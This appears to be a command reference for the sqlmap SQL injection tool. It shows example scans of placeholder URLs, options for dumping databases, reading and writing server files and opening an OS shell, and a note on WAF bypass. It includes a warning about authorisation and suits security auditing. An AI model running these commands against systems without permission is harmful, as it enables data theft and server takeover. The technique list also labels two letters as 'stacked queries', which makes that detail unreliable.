sqlmap

Run sqlmap against a single target URL

$ python sqlmap.py [[-u|--url]] "[http://www.example.com/vuln.php?id=1]"

$ python sqlmap.py [[-u|--url]] "[http://www.example.com/vuln.php]" --data="[id=1]"

$ python sqlmap.py [[-u|--url]] "[http://www.example.com/vuln.php]" --data="[query=foobar;id=1]" --param-del="[;]"

$ python sqlmap.py [[-u|--url]] "[http://www.example.com/vuln.php]" --random-agent

$ python sqlmap.py [[-u|--url]] "[http://www.example.com/vuln.php]" --auth-type [Basic] --auth-cred "[testuser:testpass]"

sqlmap -u <target URL> [options]
sqlmap -r <request file> [options]
sqlmap [generic options]

-u URL
    Target URL to scan. This is one of the most common ways to specify the target.

-r REQUESTFILE
    Load HTTP request from a stored file. Useful for complex requests or bypassing client-side validation.

--data=DATA
    HTTP POST data string. Used when scanning POST-based forms.

--cookie=COOKIE
    HTTP Cookie header value. Important for authenticated scans.

--dbs
    Enumerate database management system databases.

--tables
    Enumerate database tables for a specific database.

--columns
    Enumerate database table columns for a specific table.

--dump
    Dump database entries. Often used with --dbs, --tables, or --columns.

--users
    Enumerate database management system users.

--current-user
    Retrieve current database management system user.

--current-db
    Retrieve current database management system database.

--file-read=FILE
    Read a file from the back-end DBMS file system.

--file-write=FILE --file-dest=DEST
    Write a local file onto the back-end DBMS file system.

--os-shell
    Prompt for an interactive operating system shell on the back-end.

--os-cmd=CMD
    Execute an operating system command on the back-end.

--level=LEVEL
    Level of tests to perform (1-5, default 1). Higher levels include more requests.

--risk=RISK
    Risk of tests to perform (1-3, default 1). Higher risks include more aggressive tests.

--technique=TECH
    SQL injection techniques to use (B)oolean-based blind, (E)rror-based, (U)NION query, (Q)stacked queries, (T)ime-based blind, (S)tacked queries. Default: BEUST.

-v VERBOSE
    Verbosity level (0-6, default 1). Higher levels provide more output details.

--batch
    Never ask for user input, use default behavior.

--output-dir=DIR
    Custom output directory path for logs and dumped data.

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine and many niche features for the ultimate penetration tester. sqlmap supports a broad range of switches, from database fingerprinting and data fetching to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

It supports a wide range of database management systems, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, HSQLDB, and H2. sqlmap can identify various types of SQL injection techniques like boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band. Its versatility and extensive feature set make it an essential tool for security professionals for auditing web applications for vulnerabilities.

Using sqlmap for unauthorized SQL injection attempts is illegal and unethical. Only use this tool on systems for which you have explicit, written permission from the owner. Be aware that running sqlmap can generate a significant amount of network traffic and database activity, potentially impacting the performance and stability of the target system, and leaving extensive logs. It may also trigger intrusion detection/prevention systems (IDS/IPS).

It is paramount to understand that sqlmap is a powerful tool designed for legitimate security auditing and penetration testing. Its misuse against systems without explicit authorization is illegal and can lead to severe penalties. Always ensure you have proper authorization and understand the legal implications before using sqlmap or any similar security tool.

sqlmap is often pre-installed in penetration testing distributions like Kali Linux or Parrot OS. Alternatively, it can be installed on most Linux systems by cloning its GitHub repository or via Python's pip package manager: pip install sqlmap. Users should always refer to the official documentation for the latest installation instructions.

sqlmap includes various features to bypass Web Application Firewalls (WAFs) and other security mechanisms. This includes techniques like encoding payloads, using different HTTP methods, adding custom headers, or leveraging proxy chains. While powerful, bypassing WAFs requires a deep understanding of the target's security infrastructure and the specific WAF being used.

sqlmap was primarily developed by Bernardo Damele A. G. and first released around 2009. It quickly gained recognition within the cybersecurity community for its effectiveness and comprehensive feature set. Over the years, it has been continuously developed and maintained by a dedicated team, adding support for new database technologies, injection techniques, and evasion methods. It has become a standard, go-to tool for web application penetration testers and security auditors worldwide.

nmap(1), nikto(1)